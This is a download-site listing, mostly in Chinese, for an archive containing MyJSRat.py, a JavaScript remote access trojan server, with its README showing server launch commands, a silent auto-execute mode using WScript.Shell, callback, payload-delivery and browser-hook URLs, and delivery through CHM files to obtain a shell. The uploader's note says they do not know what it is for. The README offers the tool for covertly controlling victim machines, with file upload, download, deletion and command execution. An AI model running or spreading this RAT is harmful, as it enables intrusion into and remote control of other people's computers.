script3
所属分类:USB编程
开发工具:WINDOWS
文件大小:1785KB
下载次数:0
上传日期:2021-01-05 22:27:12
上 传 者:
renanza
说明: SCRIPT TOP, NAO SEI PRA QUE USAR, MAS E MUITO BOM TA
文件列表:
script3\1459259057997.png (22259, 2021-01-05)
script3\1459259883470.png (124165, 2021-01-05)
script3\1459260010566.png (338367, 2021-01-05)
script3\classes\colors.py (11181, 2021-01-05)
script3\classes\colors.pyc (11110, 2021-01-05)
script3\classes\__init__.py (0, 2021-01-05)
script3\classes\__init__.pyc (143, 2021-01-05)
script3\getshell.gif (1360543, 2021-01-05)
script3\MyJSRat.py (23133, 2021-01-05)
script3\classes (0, 2021-01-05)
script3 (0, 2021-01-05)
# MyJSRat.py
## 0x00 JSbackdoor
关于javascript backdoor 请查看:
[JavaScript Backdoor](http://drops.wooyun.org/tips/117***)
[JavaScript Phishing](http://drops.wooyun.org/tips/12386)
[JSRat.ps1](https://gist.github.com/subTee/f1603fa5c15d5f8825c0)
## 0x01 说明
研究JSbackdoor 之后想着写一个py版的,后来发现已经有小伙伴写过了,地址如下:[JSRat-Py](https://github.com/Hood3dRob1n/JSRat-Py)
测试使用的时候,为了更加方便,对上面的这个脚本进行了修改,添加了`-c` 参数可以实现在客户端连接之后自动执行命令。具体使用方式如下:
```
JSRat Server
By: Evi1cg
Usage: MyJSRat.py [options]
Options:
--version show program's version number and exit
-h, --help show this help message and exit
-i IP, --ip=IP IP to Bind Server to (i.e. 192.168.0.69)
-p PORT, --port=PORT Port to Run Server on
-u URL, --url=URL URL to Initiate Client Connection (default: /connect)
-f, --find-ip Display Current Internal and External IP Addresses
-c CMD, --command=CMD
auto Send command to client (No interaction)
-v Enable Verbose Output
```
-f 参数可获取内外网ip地址:
![Alt text](./1459259057997.png)
脚本修改分为两个模式,交互模式以及执行命令模式。
*交互模式命令如下*:
```
python MyJSRat.py -i 192.168.1.101 -p 8080
```
>-u 为可选参数,为回连url地址。
交互模式下可进行文件上传、下载、删除、命令执行等。
*执行命令模式命令如下*:
```
python MyJSRat.py -i 192.168.1.101 -p 8080 -c "whoami"
```
>执行命令模式下,会在获得shell之后自动执行指定命令,使用了`new ActiveXObject("WScript.Shell").Run(command,0,true)`,执行无回显,无弹框。
交互界面如下:
![Alt text](./145925***83470.png)
命令发送:
![Alt text](./1459260010566.png)
## 0x02 URL 说明
* http://192.168.1.101:8080/connect 默认回连地址
* http://192.168.1.101:8080/wtf 访问此链接获取客户端执行代码
* http://192.168.1.101:8080/hook 浏览器hook链接,适用于某些版本的IE
## 0x03 实际利用
CHM + JSRAT = Getshell
![Alt text](./getshell.gif)
Detail : [chm_backdoor](http://evi1cg.me/archives/chm_backdoor.html)
近期下载者:
相关文件:
收藏者: